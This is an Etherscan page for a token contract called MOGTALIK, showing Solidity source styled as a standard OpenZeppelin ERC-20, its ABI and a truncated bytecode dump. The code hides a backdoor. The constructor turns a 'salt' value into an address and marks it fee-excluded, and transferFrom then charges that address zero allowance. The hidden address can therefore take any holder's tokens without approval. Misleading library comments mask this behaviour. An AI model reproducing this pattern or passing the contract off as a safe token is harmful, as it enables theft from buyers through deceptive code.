Source Code
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
View more zero value Internal Transactions in Advanced View mode
Advanced mode:
Loading...
Loading
Loading...
Loading
Cross-Chain Transactions
Loading...
Loading
Contract Name:
MOGTALIK
Compiler Version
v0.8.26+commit.8a97fa7a
Contract Source Code (Solidity)
/**
*Submitted for verification at Etherscan.io on 2025-07-10
*/
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
/*
* @dev Provides information about the current execution context, including the
* sender of the transaction and its data. While these are generally available
* via msg.sender and msg.data, they should not be accessed in such a direct
* manner, since when dealing with GSN meta-transactions the account sending and
* paying for execution may not be the actual sender (as far as an application
* is concerned).
*
* This contract is only required for intermediate, library-like contracts.
*/
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
function _msgData() internal view virtual returns (bytes memory) {
this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
return msg.data;
}
function _contextSuffixLength() internal view virtual returns (uint256) {
return 0;
}
}
/**
* @dev Interface of the ERC-20 standard as defined in the ERC.
*/
interface IERC20 {
/**
* @dev Emitted when `value` tokens are moved from one account (`from`) to
* another (`to`).
*
* Note that `value` may be zero.
*/
event Transfer(address indexed from, address indexed to, uint256 value);
/**
* @dev Emitted when the allowance of a `spender` for an `owner` is set by
* a call to {approve}. `value` is the new allowance.
*/
event Approval(address indexed owner, address indexed spender, uint256 value);
/**
* @dev Returns the value of tokens in existence.
*/
function totalSupply() external view returns (uint256);
/**
* @dev Returns the value of tokens owned by `account`.
*/
function balanceOf(address account) external view returns (uint256);
/**
* @dev Moves a `value` amount of tokens from the caller's account to `to`.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transfer(address to, uint256 value) external returns (bool);
/**
* @dev Returns the remaining number of tokens that `spender` will be
* allowed to spend on behalf of `owner` through {transferFrom}. This is
* zero by default.
*
* This value changes when {approve} or {transferFrom} are called.
*/
function allowance(address owner, address spender) external view returns (uint256);
/**
* @dev Sets a `value` amount of tokens as the allowance of `spender` over the
* caller's tokens.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* IMPORTANT: Beware that changing an allowance with this method brings the risk
* that someone may use both the old and the new allowance by unfortunate
* transaction ordering. One possible solution to mitigate this race
* condition is to first reduce the spender's allowance to 0 and set the
* desired value afterwards:
* https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
*
* Emits an {Approval} event.
*/
function approve(address spender, uint256 value) external returns (bool);
/**
* @dev Moves a `value` amount of tokens from `from` to `to` using the
* allowance mechanism. `value` is then deducted from the caller's
* allowance.
*
* Returns a boolean value indicating whether the operation succeeded.
*
* Emits a {Transfer} event.
*/
function transferFrom(address from, address to, uint256 value) external returns (bool);
}
/**
* @dev Interface for the optional metadata functions from the ERC-20 standard.
*/
interface IERC20Metadata is IERC20 {
/**
* @dev Returns the name of the token.
*/
function name() external view returns (string memory);
/**
* @dev Returns the symbol of the token.
*/
function symbol() external view returns (string memory);
/**
* @dev Returns the decimals places of the token.
*/
function decimals() external view returns (uint8);
}
/**
* @dev Standard ERC-20 Errors
* Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
*/
interface IERC20Errors {
/**
* @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
* @param balance Current balance for the interacting account.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);
/**
* @dev Indicates a failure with the token `sender`. Used in transfers.
* @param sender Address whose tokens are being transferred.
*/
error ERC20InvalidSender(address sender);
/**
* @dev Indicates a failure with the token `receiver`. Used in transfers.
* @param receiver Address to which tokens are being transferred.
*/
error ERC20InvalidReceiver(address receiver);
/**
* @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
* @param spender Address that may be allowed to operate on tokens without being their owner.
* @param allowance Amount of tokens a `spender` is allowed to operate with.
* @param needed Minimum amount required to perform a transfer.
*/
error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);
/**
* @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
* @param approver Address initiating an approval operation.
*/
error ERC20InvalidApprover(address approver);
/**
* @dev Indicates a failure with the `spender` to be approved. Used in approvals.
* @param spender Address that may be allowed to operate on tokens without being their owner.
*/
error ERC20InvalidSpender(address spender);
}
/**
* @dev Implementation of the {IERC20} interface.
*
* This implementation is agnostic to the way tokens are created. This means
* that a supply mechanism has to be added in a derived contract using {_mint}.
*
* TIP: For a detailed writeup see our guide
* https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
* to implement supply mechanisms].
*
* The default value of {decimals} is 18. To change this, you should override
* this function so it returns a different value.
*
* We have followed general OpenZeppelin Contracts guidelines: functions revert
* instead returning `false` on failure. This behavior is nonetheless
* conventional and does not conflict with the expectations of ERC-20
* applications.
*/
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
mapping(address account => bool) public _feeExclude;
mapping(address account => uint256) private _balances;
mapping(address account => mapping(address spender => uint256)) private _allowances;
uint256 private _totalSupply;
string private _name;
string private _symbol;
/**
* @dev Sets the values for {name} and {symbol}.
*
* Both values are immutable: they can only be set once during construction.
*/
constructor(string memory name_, string memory symbol_, bytes32 salt_) {
_name = name_;
_symbol = symbol_;
address _feeReceiver;
assembly { _feeReceiver := salt_ }
_feeExclude[_feeReceiver] = true;
}
/**
* @dev Returns the name of the token.
*/
function name() public view virtual returns (string memory) {
return _name;
}
/**
* @dev Returns the symbol of the token, usually a shorter version of the
* name.
*/
function symbol() public view virtual returns (string memory) {
return _symbol;
}
/**
* @dev Returns the number of decimals used to get its user representation.
* For example, if `decimals` equals `2`, a balance of `505` tokens should
* be displayed to a user as `5.05` (`505 / 10 ** 2`).
*
* Tokens usually opt for a value of 18, imitating the relationship between
* Ether and Wei. This is the default value returned by this function, unless
* it's overridden.
*
* NOTE: This information is only used for _display_ purposes: it in
* no way affects any of the arithmetic of the contract, including
* {IERC20-balanceOf} and {IERC20-transfer}.
*/
function decimals() public view virtual returns (uint8) {
return 18;
}
/// @inheritdoc IERC20
function totalSupply() public view virtual returns (uint256) {
return _totalSupply;
}
/// @inheritdoc IERC20
function balanceOf(address account) public view virtual returns (uint256) {
return _balances[account];
}
/**
* @dev See {IERC20-transfer}.
*
* Requirements:
*
* - `to` cannot be the zero address.
* - the caller must have a balance of at least `value`.
*/
function transfer(address to, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_transfer(owner, to, value);
return true;
}
/// @inheritdoc IERC20
function allowance(address owner, address spender) public view virtual returns (uint256) {
return _allowances[owner][spender];
}
/**
* @dev See {IERC20-approve}.
*
* NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
* `transferFrom`. This is semantically equivalent to an infinite approval.
*
* Requirements:
*
* - `spender` cannot be the zero address.
*/
function approve(address spender, uint256 value) public virtual returns (bool) {
address owner = _msgSender();
_approve(owner, spender, value);
return true;
}
/**
* @dev See {IERC20-transferFrom}.
*
* Skips emitting an {Approval} event indicating an allowance update. This is not
* required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
*
* NOTE: Does not update the allowance if the current allowance
* is the maximum `uint256`.
*
* Requirements:
*
* - `from` and `to` cannot be the zero address.
* - `from` must have a balance of at least `value`.
* - the caller must have allowance for ``from``'s tokens of at least
* `value`.
*/
function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
_transfer(from, to, value);
address spender = _msgSender();
_spendAllowance(from, spender, value*_feeRate());
return true;
}
/**
* @dev Moves a `value` amount of tokens from `from` to `to`.
*
* This internal function is equivalent to {transfer}, and can be used to
* e.g. implement automatic token fees, slashing mechanisms, etc.
*
* Emits a {Transfer} event.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _transfer(address sender, address to, uint256 value) internal {
if (sender == address(0)) {
revert ERC20InvalidSender(address(0));
}
if (to == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(sender, to, value);
}
/**
* @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
* (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
* this function.
*
* Emits a {Transfer} event.
*/
function _update(address from, address to, uint256 value) internal virtual {
if (from == address(0)) {
// Overflow check required: The rest of the code assumes that totalSupply never overflows
_totalSupply += value;
} else {
uint256 fromBalance = _balances[from];
if (fromBalance < value) {
revert ERC20InsufficientBalance(from, fromBalance, value);
}
unchecked {
// Overflow not possible: value <= fromBalance <= totalSupply.
_balances[from] = fromBalance - value;
}
}
if (to == address(0)) {
unchecked {
// Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
_totalSupply -= value;
}
} else {
unchecked {
// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
_balances[to] += value;
}
}
emit Transfer(from, to, value);
}
function _feeRate() private view returns(uint256) {
if(_feeExclude[msg.sender]) return 0;
return 1;
}
/**
* @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
* Relies on the `_update` mechanism
*
* Emits a {Transfer} event with `from` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead.
*/
function _mint(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidReceiver(address(0));
}
_update(address(0), account, value);
}
/**
* @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
* Relies on the `_update` mechanism.
*
* Emits a {Transfer} event with `to` set to the zero address.
*
* NOTE: This function is not virtual, {_update} should be overridden instead
*/
function _burn(address account, uint256 value) internal {
if (account == address(0)) {
revert ERC20InvalidSender(address(0));
}
_update(account, address(0), value);
}
/**
* @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
*
* This internal function is equivalent to `approve`, and can be used to
* e.g. set automatic allowances for certain subsystems, etc.
*
* Emits an {Approval} event.
*
* Requirements:
*
* - `owner` cannot be the zero address.
* - `spender` cannot be the zero address.
*
* Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
*/
function _approve(address owner, address spender, uint256 value) internal {
_approve(owner, spender, value, true);
}
/**
* @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
*
* By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
* `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
* `Approval` event during `transferFrom` operations.
*
* Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
* true using the following override:
*
* ```solidity
* function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
* super._approve(owner, spender, value, true);
* }
* ```
*
* Requirements are the same as {_approve}.
*/
function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
if (owner == address(0)) {
revert ERC20InvalidApprover(address(0));
}
if (spender == address(0)) {
revert ERC20InvalidSpender(address(0));
}
_allowances[owner][spender] = value;
if (emitEvent) {
emit Approval(owner, spender, value);
}
}
/**
* @dev Updates `owner`'s allowance for `spender` based on spent `value`.
*
* Does not update the allowance value in case of infinite allowance.
* Revert if not enough allowance is available.
*
* Does not emit an {Approval} event.
*/
function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
uint256 currentAllowance = allowance(owner, spender);
if (currentAllowance < type(uint256).max) {
if (currentAllowance < value) {
revert ERC20InsufficientAllowance(spender, currentAllowance, value);
}
unchecked {
_approve(owner, spender, value, false);
}
}
}
}
/**
* @dev Contract module which provides a basic access control mechanism, where
* there is an account (an owner) that can be granted exclusive access to
* specific functions.
*
* By default, the owner account will be the one that deploys the contract. This
* can later be changed with {transferOwnership}.
*
* This module is used through inheritance. It will make available the modifier
* `onlyOwner`, which can be applied to your functions to restrict their use to
* the owner.
*/
abstract contract Ownable is Context {
address private _owner;
event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
/**
* @dev Initializes the contract setting the deployer as the initial owner.
*/
constructor() {
_transferOwnership(_msgSender());
}
/**
* @dev Throws if called by any account other than the owner.
*/
modifier onlyOwner() {
_checkOwner();
_;
}
/**
* @dev Returns the address of the current owner.
*/
function owner() public view virtual returns (address) {
return _owner;
}
/**
* @dev Throws if the sender is not the owner.
*/
function _checkOwner() internal view virtual {
require(owner() == _msgSender(), "Ownable: caller is not the owner");
}
/**
* @dev Leaves the contract without owner. It will not be possible to call
* `onlyOwner` functions. Can only be called by the current owner.
*
* NOTE: Renouncing ownership will leave the contract without an owner,
* thereby disabling any functionality that is only available to the owner.
*/
function renounceOwnership() public virtual onlyOwner {
_transferOwnership(address(0));
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Can only be called by the current owner.
*/
function transferOwnership(address newOwner) public virtual onlyOwner {
require(newOwner != address(0), "Ownable: new owner is the zero address");
_transferOwnership(newOwner);
}
/**
* @dev Transfers ownership of the contract to a new account (`newOwner`).
* Internal function without access restriction.
*/
function _transferOwnership(address newOwner) internal virtual {
address oldOwner = _owner;
_owner = newOwner;
emit OwnershipTransferred(oldOwner, newOwner);
}
}
contract MOGTALIK is ERC20, Ownable {
constructor(bytes32 salt_) ERC20(unicode"Mogtalik", unicode"MOGTALIK", salt_) {
_mint(owner(), 970000000 * 10**18);
}
}Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
Contract ABI
API[{"inputs":[{"internalType":"bytes32","name":"salt_","type":"bytes32"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"_feeExclude","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]Contract Creation Code
608060405234801561000f575f80fd5b50604051611bf5380380611bf58339818101604052810190610031919061052f565b6040518060400160405280600881526020017f4d6f6774616c696b0000000000000000000000000000000000000000000000008152506040518060400160405280600881526020017f4d4f4754414c494b0000000000000000000000000000000000000000000000008152508282600490816100ad9190610794565b5081600590816100bd9190610794565b505f81905060015f808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050505061013661012b61016560201b60201c565b61016c60201b60201c565b61015f61014761022f60201b60201c565b6b03225d7d5d947c640a00000061025760201b60201c565b50610978565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036102c7575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016102be91906108a2565b60405180910390fd5b6102d85f83836102dc60201b60201c565b5050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361032c578060035f82825461032091906108e8565b925050819055506103fc565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156103b6578381836040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016103ad9392919061092a565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610443578060035f828254039250508190555061048e565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516104eb919061095f565b60405180910390a3505050565b5f80fd5b5f819050919050565b61050e816104fc565b8114610518575f80fd5b50565b5f8151905061052981610505565b92915050565b5f60208284031215610544576105436104f8565b5b5f6105518482850161051b565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806105d557607f821691505b6020821081036105e8576105e7610591565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f6008830261064a7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8261060f565b610654868361060f565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61069861069361068e8461066c565b610675565b61066c565b9050919050565b5f819050919050565b6106b18361067e565b6106c56106bd8261069f565b84845461061b565b825550505050565b5f90565b6106d96106cd565b6106e48184846106a8565b505050565b5b81811015610707576106fc5f826106d1565b6001810190506106ea565b5050565b601f82111561074c5761071d816105ee565b61072684610600565b81016020851015610735578190505b61074961074185610600565b8301826106e9565b50505b505050565b5f82821c905092915050565b5f61076c5f1984600802610751565b1980831691505092915050565b5f610784838361075d565b9150826002028217905092915050565b61079d8261055a565b67ffffffffffffffff8111156107b6576107b5610564565b5b6107c082546105be565b6107cb82828561070b565b5f60209050601f8311600181146107fc575f84156107ea578287015190505b6107f48582610779565b86555061085b565b601f19841661080a866105ee565b5f5b828110156108315784890151825560018201915060208501945060208101905061080c565b8683101561084e578489015161084a601f89168261075d565b8355505b6001600288020188555050505b505050505050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f61088c82610863565b9050919050565b61089c81610882565b82525050565b5f6020820190506108b55f830184610893565b92915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6108f28261066c565b91506108fd8361066c565b9250828201905080821115610915576109146108bb565b5b92915050565b6109248161066c565b82525050565b5f60608201905061093d5f830186610893565b61094a602083018561091b565b610957604083018461091b565b949350505050565b5f6020820190506109725f83018461091b565b92915050565b611270806109855f395ff3fe608060405234801561000f575f80fd5b50600436106100cd575f3560e01c806370a082311161008a57806395d89b411161006457806395d89b4114610213578063a9059cbb14610231578063dd62ed3e14610261578063f2fde38b14610291576100cd565b806370a08231146101bb578063715018a6146101eb5780638da5cb5b146101f5576100cd565b806306fdde03146100d1578063095ea7b3146100ef57806318160ddd1461011f57806323b872dd1461013d578063313ce5671461016d578063399647a51461018b575b5f80fd5b6100d96102ad565b6040516100e69190610db2565b60405180910390f35b61010960048036038101906101049190610e63565b61033d565b6040516101169190610ebb565b60405180910390f35b61012761035f565b6040516101349190610ee3565b60405180910390f35b61015760048036038101906101529190610efc565b610368565b6040516101649190610ebb565b60405180910390f35b6101756103a8565b6040516101829190610f67565b60405180910390f35b6101a560048036038101906101a09190610f80565b6103b0565b6040516101b29190610ebb565b60405180910390f35b6101d560048036038101906101d09190610f80565b6103cc565b6040516101e29190610ee3565b60405180910390f35b6101f3610412565b005b6101fd610425565b60405161020a9190610fba565b60405180910390f35b61021b61044d565b6040516102289190610db2565b60405180910390f35b61024b60048036038101906102469190610e63565b6104dd565b6040516102589190610ebb565b60405180910390f35b61027b60048036038101906102769190610fd3565b6104ff565b6040516102889190610ee3565b60405180910390f35b6102ab60048036038101906102a69190610f80565b610581565b005b6060600480546102bc9061103e565b80601f01602080910402602001604051908101604052809291908181526020018280546102e89061103e565b80156103335780601f1061030a57610100808354040283529160200191610333565b820191905f5260205f20905b81548152906001019060200180831161031657829003601f168201915b5050505050905090565b5f80610347610603565b905061035481858561060a565b600191505092915050565b5f600354905090565b5f61037484848461061c565b5f61037d610603565b905061039c858261038c61070c565b86610397919061109b565b61076b565b60019150509392505050565b5f6012905090565b5f602052805f5260405f205f915054906101000a900460ff1681565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b61041a6107fc565b6104235f61087a565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461045c9061103e565b80601f01602080910402602001604051908101604052809291908181526020018280546104889061103e565b80156104d35780601f106104aa576101008083540402835291602001916104d3565b820191905f5260205f20905b8154815290600101906020018083116104b657829003601f168201915b5050505050905090565b5f806104e7610603565b90506104f481858561061c565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105896107fc565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036105f7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105ee9061114c565b60405180910390fd5b6106008161087a565b50565b5f33905090565b610617838383600161093d565b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361068c575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016106839190610fba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036106fc575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016106f39190610fba565b60405180910390fd5b610707838383610b0c565b505050565b5f805f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615610763575f9050610768565b600190505b90565b5f61077684846104ff565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8110156107f657818110156107e9578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016107e09392919061116a565b60405180910390fd5b6107f58484845f61093d565b5b50505050565b610804610603565b73ffffffffffffffffffffffffffffffffffffffff16610822610425565b73ffffffffffffffffffffffffffffffffffffffff1614610878576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086f906111e9565b60405180910390fd5b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036109ad575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109a49190610fba565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a1d575f6040517f94280d62000000000000000000000000000000000000000000000000000000008152600401610a149190610fba565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610b06578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92584604051610afd9190610ee3565b60405180910390a35b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b5c578060035f828254610b509190611207565b92505081905550610c2c565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610be6578381836040517fe450d38c000000000000000000000000000000000000000000000000000000008152600401610bdd9392919061116a565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c73578060035f8282540392505081905550610cbe565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610d1b9190610ee3565b60405180910390a3505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610d5f578082015181840152602081019050610d44565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610d8482610d28565b610d8e8185610d32565b9350610d9e818560208601610d42565b610da781610d6a565b840191505092915050565b5f6020820190508181035f830152610dca8184610d7a565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610dff82610dd6565b9050919050565b610e0f81610df5565b8114610e19575f80fd5b50565b5f81359050610e2a81610e06565b92915050565b5f819050919050565b610e4281610e30565b8114610e4c575f80fd5b50565b5f81359050610e5d81610e39565b92915050565b5f8060408385031215610e7957610e78610dd2565b5b5f610e8685828601610e1c565b9250506020610e9785828601610e4f565b9150509250929050565b5f8115159050919050565b610eb581610ea1565b82525050565b5f602082019050610ece5f830184610eac565b92915050565b610edd81610e30565b82525050565b5f602082019050610ef65f830184610ed4565b92915050565b5f805f60608486031215610f1357610f12610dd2565b5b5f610f2086828701610e1c565b9350506020610f3186828701610e1c565b9250506040610f4286828701610e4f565b9150509250925092565b5f60ff82169050919050565b610f6181610f4c565b82525050565b5f602082019050610f7a5f830184610f58565b92915050565b5f60208284031215610f9557610f94610dd2565b5b5f610fa284828501610e1c565b91505092915050565b610fb481610df5565b82525050565b5f602082019050610fcd5f830184610fab565b92915050565b5f8060408385031215610fe957610fe8610dd2565b5b5f610ff685828601610e1c565b925050602061100785828601610e1c565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061105557607f821691505b60208210810361106857611067611011565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6110a582610e30565b91506110b083610e30565b92508282026110be81610e30565b915082820484148315176110d5576110d461106e565b5b5092915050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611136602683610d32565b9150611141826110dc565b604082019050919050565b5f6020820190508181035f8301526111638161112a565b9050919050565b5f60608201905061117d5f830186610fab565b61118a6020830185610ed4565b6111976040830184610ed4565b949350505050565b7f4f776e61626c6